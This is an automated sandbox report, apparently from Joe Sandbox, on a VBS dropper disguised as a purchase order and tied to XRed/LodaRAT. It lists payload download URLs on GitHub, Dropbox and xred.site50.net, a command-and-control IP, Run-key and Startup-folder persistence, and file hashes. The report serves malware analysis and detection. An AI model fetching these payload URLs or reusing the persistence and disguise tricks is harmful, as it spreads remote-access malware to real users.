C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe | 68% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\Documents\CZQKSDDMWR\~$cache1 | 92% | ReversingLabs | Win32.Worm.Zorex |
                                No Antivirus matches
                                No Antivirus matches
Source | Detection | Scanner | Label | Link
https://drive.us | 0% | Avira URL Cloud | safe |
http://xred.site50.net/syn/SUpdate.ini0$ | 100% | Avira URL Cloud | malware |
http://xred.site50.net/syn/SSLLibrary.dl | 100% | Avira URL Cloud | malware |
http://crl.mib | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
freedns.afraid.org | 69.42.215.252 | true | false | | high
docs.google.com | 142.250.185.78 | true | false | | high
raw.githubusercontent.com | 185.199.108.133 | true | false | | high
drive.usercontent.google.com | 142.250.186.161 | true | false | | high
xred.mooo.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
xred.mooo.com | false | | high
https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exe | false | | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/) | wscript.exe, 00000000.00000002.1312382254.000001940EFC9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310308003.000001940EFC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310253929.000001940EFA3000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docs.google.com/6Smr; | Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exe/ | wscript.exe, 00000000.00000003.1310699131.000001940EF41000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312257308.000001940EF43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310598692.000001940EF3E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/Synaptics.rarZ | Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1 | Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.dr | false | | high
http://crl.mib | Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docs.google.com/4 | Synaptics.exe, 00000010.00000002.2296543685.000000001D60F000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/SUpdate.ini0$ | update.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978O | Synaptics.exe, 00000010.00000002.2211766552.0000000000675000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docs.google.com/... | Synaptics.exe, 00000010.00000002.2299504453.000000001D6AB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.us | Synaptics.exe, 00000010.00000002.2299504453.000000001D6AB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1: | Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/ | Synaptics.exe, 00000010.00000002.2215408507.0000000004DA0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/Synaptics.rar | Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.dr | false | | high
                                                                      https://docs.google.com/INKrSynaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/mainwscript.exe, wscript.exe, 00000000.00000002.1312536779.00000194110E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312928343.0000019411EC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312434862.000001940F275000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978/TSynaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://drive.usercontent.google.com/:USynaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://docs.google.com/Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2299504453.000000001D6AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://docs.google.com/google.com/Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://raw.githubusercontent.com/wscript.exe, 00000000.00000002.1312382254.000001940EFC9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310308003.000001940EFC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310253929.000001940EFA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://xred.site50.net/syn/SSLLibrary.dlupdate.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drfalse
                                                                                          high
                                                                                          https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~DF16C6BEDBEDB6C577.TMP.18.dr, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drfalse
                                                                                            high
                                                                                            https://drive.usercontent.google.com/LUSynaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://xred.site50.net/syn/SUpdate.iniSynaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drfalse
                                                                                                  high
                                                                                                  https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exeyzwscript.exe, 00000000.00000003.1311634064.00000194116A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312583846.00000194116A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://raw.githubusercontent.com/Xwscript.exe, 00000000.00000003.1311634064.00000194116B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312583846.00000194116B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exepKwscript.exe, 00000000.00000002.1312554054.0000019411690000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exeupwscript.exe, 00000000.00000003.1310699131.000001940EF41000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312257308.000001940EF43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310598692.000001940EF3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://ip-score.com/checkip/rentControlSet._cache_update.exe, 0000000F.00000002.2555338528.0000000001776000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://docs.google.com/uc?id=0;Synaptics.exe, 00000010.00000002.2246970703.000000000C23E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2269548547.000000001163E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2331551344.000000002713E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2285525995.00000000193FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2274954141.000000001417E000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=Dupdate.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exelzwscript.exe, 00000000.00000003.1311634064.00000194116A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312583846.00000194116A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://docs.google.com/uc?id=0BxsMXGSynaptics.exe, 00000010.00000002.2252749844.000000000E67E000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exeMzwscript.exe, 00000000.00000003.1311634064.00000194116A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312583846.00000194116A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://xred.site50.net/syn/SSLLibrary.dllSynaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drfalse
                                                                                                                          high
                                                                                                                          https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlupdate.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.185.78 | docs.google.com | United States | 15169 | GOOGLEUS | false
142.250.186.161 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
185.199.108.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
172.111.138.100 | unknown | United States | 3223 | VOXILITYGB | true
69.42.215.252 | freedns.afraid.org | United States | 17048 | AWKNET-LLCUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582354
Start date and time: 2024-12-30 11:46:42 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 39
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Purchase Order Summary Details.vbs
Detection: MAL
Classification: mal100.troj.adwa.expl.evad.winVBS@26/77@14/5
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            • Number of executed functions: 88
                                                                                                                            • Number of non-executed functions: 279
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .vbs
                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.109.32.97, 184.28.90.27, 52.113.194.132, 52.168.117.175, 20.189.173.21, 13.107.246.45, 20.109.210.53, 20.190.159.2
                                                                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, login.live.com, e16604.g.akamaiedge.net, onedsblobprdwus16.westus.cloudapp.azure.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, onedscolprdeus19.eastus.cloudapp.azure.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:56:43 | API Interceptor | 517x Sleep call for process: Synaptics.exe modified
06:57:50 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
11:47:44 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
11:47:56 | Task Scheduler | Run new task: BQQQVU.exe path: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
12:56:37 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BQQQVU "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
12:56:46 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
12:56:54 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BQQQVU "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
12:57:02 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
12:57:10 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BQQQVU.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.199.108.133 | cr_asm.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
 | vF20HtY4a4.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
 | VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
 | OSLdZanXNc.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
 | gaber.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
 | cr_asm.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
172.111.138.100 | VKKDXE.exe | malicious | LodaRAT, XRed |
 | New PO - Supplier 16-12-2024-Pdf.exe | malicious | XRed |
 | Supplier.bat | malicious | LodaRAT, XRed |
 | Purchase-Order.exe | malicious | LodaRAT, XRed |
 | test.msi | malicious | LodaRAT |
 | FGNEBI.exe | malicious | LodaRAT, XRed |
 | sdlvrr.msi | malicious | LodaRAT |
 | LWQDFZ.exe | malicious | LodaRAT, XRed |
 | JPS.exe | malicious | LodaRAT, XRed |
 | KOGJZW.exe | malicious | LodaRAT, XRed |
69.42.215.252 | xyxmml.msi | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
 | valyzt.msi | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
 | VKKDXE.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                docx.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                222.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe | JPS.exe | malicious | LodaRAT, XRed
C:\ProgramData\Synaptics\Synaptics.exe | JPS.exe | malicious | LodaRAT, XRed
C:\ProgramData\Synaptics\RCXD42.tmp | JPS.exe | malicious | LodaRAT, XRed
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):118
                                                                                                                                                      Entropy (8bit):3.5700810731231707
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                                                      MD5:573220372DA4ED487441611079B623CD
                                                                                                                                                      SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                                                      SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                                                      SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                                                      Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<HeartbeatCache/>
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):65536
                                                                                                                                                      Entropy (8bit):1.2163213998726685
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:9dZmrb/Vps5ImO0BU/3DzJDzqjICB4HpOO1IzuiFLZ24IO8EKDzy:58py5PBU/3JqjIy1zuiFLY4IO8zy
                                                                                                                                                      MD5:1C68849EBEE3958E67C4137B26AC9C60
                                                                                                                                                      SHA1:DF8E9F064634F65ACAD0A9EAEDD4565670E40F31
                                                                                                                                                      SHA-256:3315445610CD917EF359E047F29594492D65EF9D2EDE77C8624C3079C281FFB1
                                                                                                                                                      SHA-512:F70A0D496E9F554D343D44F380DA079C71A965DFE5B673BAEEA9321832B93AE0774582F2E3F644F12FB94D85F1A04B454C58289B08FD1C678352BE4AAA262660
                                                                                                                                                      Malicious:false
Preview:Version=1..EventType=APPCRASH..EventTime=133800334577230924..ReportType=2..Consent=1..UploadTime=133800334685668458..ReportStatus=524384..ReportIdentifier=f021d51d-937a-4ae6-9bba-897446c344f2..IntegratorReportIdentifier=62928b0f-bcf8-4cd4-a36a-c4a94b622201..Wow64Host=34404..Wow64Guest=332..NsAppName=Synaptics.exe..AppSessionGuid=00001e40-0001-0014-821b-b947a85adb01..TargetAppId=W:0006b99a137d593dda9d158dc8b6b7720deb00001f04!0000f44da6758d62d39c9f96e18763dca6fc858385ef!Synaptics.exe..TargetAppVe
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6326
                                                                                                                                                      Entropy (8bit):3.72129161586642
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:R6l7wVeJXx96mB1YiS8lprW89bXBsfImC9m:R6lXJr6mB1Y03X6fIs
                                                                                                                                                      MD5:56A4137DA7B8ADB187DA4D1EDF41F5DC
                                                                                                                                                      SHA1:3112369940407C12E0BF748D75A67DE0B7C0963F
                                                                                                                                                      SHA-256:1C7D358D7BB7916D984566CD18C088AC3EE8C6804DDD6D948234F1CA95072795
                                                                                                                                                      SHA-512:0C0D2A619582920DA6BD228C140448C9AF56EF9D38B007720DEC63913DBA1294F3C88CAD556BBFB1EEF9532FB00D002A83C1D0A434E4A194A92C41AB9C6DA682
                                                                                                                                                      Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>7744</Pi
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4572
                                                                                                                                                      Entropy (8bit):4.447685200134729
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:cvIwWl8zsvJg77aI9p2WpW8VY5vYm8M4JFEFj7+q8471KZ1d:uIjfRI7bX7VmyJc7KZ1d
                                                                                                                                                      MD5:D170D19396388FD8B1C06AEBA165687B
                                                                                                                                                      SHA1:54291E220890FB7996CC8667C9FCF2B8D14D85E3
                                                                                                                                                      SHA-256:07EC40749824DA75861058215B921CAF6DFF09ABC682FED4F04D74DB63BEE730
                                                                                                                                                      SHA-512:AEC0BEFD6064EAB3681A466B468CD84D2B91895DF3691A4B1ADD56BECE50DBDD0D7E4CBD697206CA3461E1409A621DAEDAF871A75A9F71D74383B3A54392D94D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Mon Dec 30 11:57:41 2024, 0x1205a4 type
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4390688
                                                                                                                                                      Entropy (8bit):2.307414511777458
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:CC/eiqzvb4xuA9KmzZQX+EBMTKaauw6fZlqSvNaLwUMSnR2Ik7mqJH+h4ue2/4+Q:CCXTFBls9IQuiUU
                                                                                                                                                      MD5:5B57B40147845EF566C98CCACAF6390B
                                                                                                                                                      SHA1:6173AAD15BA809B38B78C1B47DA06A442C09060E
                                                                                                                                                      SHA-256:C6C3836256A2712F6E61CAE2DDD365D5304E5CA62BEA24FF77A0F30CFFF51715
                                                                                                                                                      SHA-512:105261A95D87F20B94E077D7E59883ACA223CF163C8DD072524BF25970F3EDD8070D18C9850E8BCA2CB5A277861CF4E78F73375BDF29727CB60038D758B35395
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):771584
                                                                                                                                                      Entropy (8bit):6.632480030468604
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Igr:ansJ39LyjbJkQFMhmC+6GD9n
                                                                                                                                                      MD5:B50AAC59E97F3D38A19ACB9253FABEBC
                                                                                                                                                      SHA1:F44DA6758D62D39C9F96E18763DCA6FC858385EF
                                                                                                                                                      SHA-256:634238998B9CA21CE7558C5410FFD9D21E42AC069FFEB1B590EED99BAC7C1F02
                                                                                                                                                      SHA-512:B8B07692BF6770D1F67F5A9CCE809F9B20EDCA21E7480151D0FA35AC1CFC61CBA5953B0475CAAA3C4892860C0CEE287E689E50FC1727CE9533FD87A85DA820B4
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXD42.tmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXD42.tmp, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                      Joe Sandbox View:
• Filename: JPS.exe, Detection: malicious
                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1989120
                                                                                                                                                      Entropy (8bit):6.934025794433937
                                                                                                                                                      Encrypted:false
